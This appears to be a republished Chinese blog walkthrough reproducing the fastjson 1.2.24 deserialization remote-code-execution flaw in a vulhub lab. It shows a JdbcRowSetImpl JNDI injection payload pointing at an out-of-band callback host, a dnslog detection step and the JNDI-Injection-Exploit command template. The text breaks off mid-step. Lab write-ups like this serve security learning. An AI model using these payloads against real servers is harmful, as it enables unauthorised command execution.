fastjson 1.2.24 反序列化导致任意命令执行漏洞

fastjson 1.2.24 反序列化导致任意命令执行漏洞

1 在线漏洞解读:

https://vulhub.org/#/environments/fastjson/1.2.24-rce/
1

2 环境搭建

cd  /home/kali/vulhub/fastjson/1.2.24-rce
1

2.1 启动：

sudo docker-compose up -d

sudo docker-compose ps -a
sudo docker ps -a
1
2
3
4

2.2 已启动：访问端口8090

3 影响版本：

​ fastjson 1.2.24

4 漏洞复现

4.1 访问页面

​ 访问页面http://192.168.225.166:8090/,返回json字符串

4.2 bp抓包，修改参数

4.2.1使用bp进行抓包，转发repeater，将get请求转成post

4.2.2 修改请求参数为json, 增加json参数进行传参，返回序列化后的参数值

{
	"name":"test",
	"age": 18
}
1
2
3
4

5 使用插件检测漏洞【FastjsonScan】

https://github.com/Maskhe/FastjsonScan
1

5.1使用説明

• 下载项目中的FastjsonScan.jar文件

  

• 在burp的Extender->Extensions栏，点击Add,选择下载好的jar文件就可以了（执行环境是Java)

如果成功安装，会输出如下信息，如果未能成功安装可以换下jdk版本？？我用的1.8

5.2 使用方法

使用方法也很简单，就像使用repeater一样，你可以在burp的任何地方选中一个请求右键选择【Send to FastjsonScan】将这个请求发送到Fastjson Scan，然后就只需要等待扫描结束

5.2.1 右键菜单中：

5.2.2 FastjsonScan扫描结果界面：

{"handsome":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://weedjc37lvb2aq0bw6k08gkax13rrg.oastify.com/aaa","autoCommit":true}}
1

5.2.3 打开dnslog解析地址，获取的地址粘贴到bp的请求参数中看是否请求成功

http://dnslog.cn/  # 获取新的地址 5z5srb.dnslog.cn
1

5.2.4 使用rmi协议不通

5.2.5 尝试使用ldap协议，dnslog协议通了

5.2.6 dnslog.cn通了，可以请求成功，存在漏洞，下面对其进行利用

6 构建一个imr服务器

6.1 java通信协议

JNDI，Java Nameing and Directory Interface，Java 命令与目录接口，是一组应用程序接口，目的是为了方便查找远程或本地对象。JNDI 典型的应用场景是配置数据源，除此之外，JNDI 还可以访问现有的目录和服务，例如LDAP| RMI| CORBA| DNS| NDS| NIS
1

6.2 下载工具JNDI协议服务

https://github.com/welk1n/JNDI-Injection-Exploit
1

6.3 执行漏洞核心指令

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

要确保 1099、1389、8180端口可用，不被其他程序占用
1
2
3

7 kali进行下载安裝JNDI服务

┌──(kali
声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/正经夜光杯/article/detail/923103